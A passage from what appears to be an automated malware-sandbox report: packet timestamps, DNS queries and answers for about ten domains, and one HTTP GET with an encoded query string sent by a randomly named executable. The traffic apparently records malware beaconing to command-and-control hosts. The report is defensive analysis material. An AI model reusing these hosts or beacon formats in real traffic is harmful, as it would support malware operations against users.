                                                                                                                    Dec 24, 2024 11:37:09.443824053 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.446358919 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.446393967 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.446990013 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:09.447084904 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:10.415359020 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:10.415412903 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:10.415455103 CET8049888199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:10.415474892 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:10.415563107 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:10.837013960 CET4988880192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:11.855607033 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:11.975439072 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:11.975601912 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:11.990228891 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:12.110079050 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:13.071743011 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:13.071909904 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:13.071921110 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:13.072050095 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:13.074561119 CET4989680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:13.194183111 CET8049896199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:18.624855995 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:18.744534016 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:18.744636059 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:18.759177923 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:18.878803015 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:19.919882059 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:19.919905901 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:19.919946909 CET8049914199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:19.920043945 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:20.274885893 CET4991480192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:21.293298006 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:21.412914991 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:21.412991047 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:21.428368092 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:21.548959970 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:22.508752108 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:22.508766890 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:22.508776903 CET8049920199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:22.508821964 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:22.930984974 CET4992080192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:23.950136900 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:24.069658041 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.069734097 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:24.084553003 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:24.204220057 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204257011 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204375982 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204395056 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204484940 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204500914 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204600096 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204608917 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:24.204638958 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:25.178599119 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:25.178627968 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:25.178644896 CET8049926199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:25.178949118 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:25.178949118 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:25.587235928 CET4992680192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:26.605763912 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:26.725394011 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:26.725488901 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:26.735771894 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:26.855300903 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:27.820919991 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:27.821013927 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:27.821197987 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:27.821254969 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:27.821301937 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:27.824210882 CET4993380192.168.2.4199.59.243.227
                                                                                                                    Dec 24, 2024 11:37:27.943667889 CET8049933199.59.243.227192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:33.359664917 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:33.479304075 CET804995047.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:33.479392052 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:33.494384050 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:33.614078999 CET804995047.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:35.009227991 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:35.129209042 CET804995047.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:35.129275084 CET4995080192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:36.029334068 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:36.149075031 CET804995947.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:36.149240017 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:36.163964033 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:36.283734083 CET804995947.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:37.665319920 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:37.785162926 CET804995947.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:37.785244942 CET4995980192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:38.685116053 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:38.804701090 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.804819107 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:38.825289011 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:38.944989920 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945022106 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945094109 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945215940 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945226908 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945235014 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945266962 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945276976 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:38.945343971 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:40.337290049 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:40.457209110 CET804996547.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:40.457318068 CET4996580192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:41.356379032 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:41.476315022 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:41.476475954 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:41.486989021 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:41.606611013 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:43.688059092 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:43.688251972 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:43.688311100 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:43.690851927 CET4997180192.168.2.447.83.1.90
                                                                                                                    Dec 24, 2024 11:37:43.810497046 CET804997147.83.1.90192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:49.124932051 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:49.244520903 CET8049991104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:49.244663954 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:49.262809038 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:49.382877111 CET8049991104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:50.777314901 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:50.897320032 CET8049991104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:50.897387981 CET4999180192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:51.793726921 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:51.913423061 CET8049997104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:51.915857077 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:51.932306051 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:52.051830053 CET8049997104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:53.446671963 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:53.566554070 CET8049997104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:53.566708088 CET4999780192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:54.466581106 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:54.586312056 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.586441040 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:54.601563931 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:54.721323013 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721338987 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721415997 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721430063 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721445084 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721636057 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721649885 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721740007 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:54.721755028 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:56.102994919 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:56.174464941 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:56.174500942 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:56.174524069 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:56.174542904 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:56.175446033 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:56.175488949 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:56.222770929 CET8050004104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:56.222824097 CET5000480192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:57.121896982 CET5001280192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:57.241511106 CET8050012104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:57.241734028 CET5001280192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:57.250525951 CET5001280192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:57.370019913 CET8050012104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:59.023072004 CET8050012104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:59.023078918 CET8050012104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:59.023192883 CET8050012104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:59.023202896 CET5001280192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:59.023255110 CET5001280192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:59.026025057 CET5001280192.168.2.4104.21.80.1
                                                                                                                    Dec 24, 2024 11:37:59.145617008 CET8050012104.21.80.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:05.121207952 CET5003080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:05.240835905 CET805003085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:05.240921021 CET5003080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:05.256869078 CET5003080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:05.376653910 CET805003085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:06.759331942 CET5003080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:06.879332066 CET805003085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:06.879434109 CET5003080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:07.777909994 CET5003680192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:07.897418976 CET805003685.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:07.897569895 CET5003680192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:07.912138939 CET5003680192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:08.031696081 CET805003685.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:09.415625095 CET5003680192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:09.535366058 CET805003685.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:09.535440922 CET5003680192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:10.434544086 CET5004080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:10.554227114 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:10.554579020 CET5004080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:10.569849014 CET5004080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:10.689357996 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:10.689438105 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:10.689459085 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:10.689526081 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:10.689538956 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:10.689651012 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:10.689663887 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:10.689723015 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:10.689745903 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:12.071886063 CET5004080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:12.191833973 CET805004085.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:12.191929102 CET5004080192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:13.090604067 CET5004180192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:13.210298061 CET805004185.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:13.210382938 CET5004180192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:13.224646091 CET5004180192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:13.344698906 CET805004185.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:14.539556026 CET805004185.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:14.539849997 CET805004185.159.66.93192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:14.539915085 CET5004180192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:14.542280912 CET5004180192.168.2.485.159.66.93
                                                                                                                    Dec 24, 2024 11:38:14.661988020 CET805004185.159.66.93192.168.2.4

                                                                                                                    UDP Packets

                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                    Dec 24, 2024 11:36:01.676346064 CET5433953192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:36:02.000214100 CET53543391.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:18.371068954 CET6374753192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:36:19.249984026 CET53637471.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:33.496670961 CET6291753192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:36:34.035727978 CET53629171.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:36:48.262309074 CET6264253192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:36:48.683394909 CET53626421.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:03.039784908 CET4991553192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:37:03.751362085 CET53499151.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:18.091856003 CET5452353192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:37:18.622483969 CET53545231.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:32.841705084 CET5821153192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:37:33.350106001 CET53582111.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:37:48.700599909 CET5625853192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:37:49.121373892 CET53562581.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:04.044321060 CET6008353192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:38:05.056231976 CET6008353192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:38:05.118103027 CET53600831.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:05.218214035 CET53600831.1.1.1192.168.2.4
                                                                                                                    Dec 24, 2024 11:38:19.840672970 CET6352253192.168.2.41.1.1.1
                                                                                                                    Dec 24, 2024 11:38:20.298772097 CET53635221.1.1.1192.168.2.4

                                                                                                                    DNS Queries

                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                    Dec 24, 2024 11:36:01.676346064 CET192.168.2.41.1.1.10xb54fStandard query (0)www.bgezakofe.shopA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:36:18.371068954 CET192.168.2.41.1.1.10xd10Standard query (0)www.techstarllc.cloudA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:36:33.496670961 CET192.168.2.41.1.1.10x5cStandard query (0)www.hokasportshoes.shopA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:36:48.262309074 CET192.168.2.41.1.1.10x2d84Standard query (0)www.primetream.liveA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:03.039784908 CET192.168.2.41.1.1.10x8b8dStandard query (0)www.sorket.techA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:18.091856003 CET192.168.2.41.1.1.10x4493Standard query (0)www.1337street.shopA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:32.841705084 CET192.168.2.41.1.1.10xea82Standard query (0)www.cruycq.infoA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:48.700599909 CET192.168.2.41.1.1.10x90c3Standard query (0)www.dejikenkyu.cyouA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:04.044321060 CET192.168.2.41.1.1.10x3eeStandard query (0)www.letsbookcruise.xyzA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:05.056231976 CET192.168.2.41.1.1.10x3eeStandard query (0)www.letsbookcruise.xyzA (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:19.840672970 CET192.168.2.41.1.1.10x3ee5Standard query (0)www.stoauto.proA (IP address)IN (0x0001)false

                                                                                                                    DNS Answers

                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                    Dec 24, 2024 11:36:02.000214100 CET1.1.1.1192.168.2.40xb54fNo error (0)www.bgezakofe.shop104.21.10.26A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:36:02.000214100 CET1.1.1.1192.168.2.40xb54fNo error (0)www.bgezakofe.shop172.67.189.219A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:36:19.249984026 CET1.1.1.1192.168.2.40xd10No error (0)www.techstarllc.cloudtechstarllc.cloudCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:36:19.249984026 CET1.1.1.1192.168.2.40xd10No error (0)techstarllc.cloud45.41.206.57A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:36:34.035727978 CET1.1.1.1192.168.2.40x5cNo error (0)www.hokasportshoes.shop94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:36:34.035727978 CET1.1.1.1192.168.2.40x5cNo error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:36:48.683394909 CET1.1.1.1192.168.2.40x2d84No error (0)www.primetream.live162.0.236.169A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:03.751362085 CET1.1.1.1192.168.2.40x8b8dNo error (0)www.sorket.tech199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:18.622483969 CET1.1.1.1192.168.2.40x4493No error (0)www.1337street.shop94950.bodis.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:18.622483969 CET1.1.1.1192.168.2.40x4493No error (0)94950.bodis.com199.59.243.227A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:33.350106001 CET1.1.1.1192.168.2.40xea82No error (0)www.cruycq.info47.83.1.90A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:49.121373892 CET1.1.1.1192.168.2.40x90c3No error (0)www.dejikenkyu.cyou104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:49.121373892 CET1.1.1.1192.168.2.40x90c3No error (0)www.dejikenkyu.cyou104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:49.121373892 CET1.1.1.1192.168.2.40x90c3No error (0)www.dejikenkyu.cyou104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:49.121373892 CET1.1.1.1192.168.2.40x90c3No error (0)www.dejikenkyu.cyou104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:49.121373892 CET1.1.1.1192.168.2.40x90c3No error (0)www.dejikenkyu.cyou104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:49.121373892 CET1.1.1.1192.168.2.40x90c3No error (0)www.dejikenkyu.cyou104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:37:49.121373892 CET1.1.1.1192.168.2.40x90c3No error (0)www.dejikenkyu.cyou104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:05.118103027 CET1.1.1.1192.168.2.40x3eeNo error (0)www.letsbookcruise.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:05.118103027 CET1.1.1.1192.168.2.40x3eeNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:05.118103027 CET1.1.1.1192.168.2.40x3eeNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:05.218214035 CET1.1.1.1192.168.2.40x3eeNo error (0)www.letsbookcruise.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:05.218214035 CET1.1.1.1192.168.2.40x3eeNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:05.218214035 CET1.1.1.1192.168.2.40x3eeNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                                                                                                    Dec 24, 2024 11:38:20.298772097 CET1.1.1.1192.168.2.40x3ee5No error (0)www.stoauto.pro194.58.112.174A (IP address)IN (0x0001)false

                                                                                                                    HTTP Request Dependency Graph

                                                                                                                    • www.bgezakofe.shop
                                                                                                                    • www.techstarllc.cloud
                                                                                                                    • www.hokasportshoes.shop
                                                                                                                    • www.primetream.live
                                                                                                                    • www.sorket.tech
                                                                                                                    • www.1337street.shop
                                                                                                                    • www.cruycq.info
                                                                                                                    • www.dejikenkyu.cyou
                                                                                                                    • www.letsbookcruise.xyz

                                                                                                                    HTTP Packets

                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    0192.168.2.449743104.21.10.26801228C:\Program Files (x86)\nsYznENmjbfQOCpnQVhGwqSgVOQbZKPNbWXNErbcpZSodAuxsZTNqhQzL\kygSlzwdnMXWUy.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Dec 24, 2024 11:36:02.134627104 CET423OUTGET /xyk7/?APatc2S=7w6h3yg5DzwdgNI65S7VcS/c5VHhBop0WwRkNseC06Sr52JwcWk0c6DqTwIm1K9fQyswYfQJG9wFl64D0T3JITTmdOuXWIhwMsN5rklNN+kNuHqELEqoQwI=&3FNHL=wVCtFrFXof HTTP/1.1
                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                    Host: www.bgezakofe.shop
                                                                                                                    Connection: close
                                                                                                                    User-Agent: Opera/9.80 (J2ME/MIDP; Opera Mini/4.2.18975/37.6502; U; es) Presto/2.12.423 Version/12.16
                                                                                                                    Dec 24, 2024 11:36:03.323705912 CET958INHTTP/1.1 404 Not Found
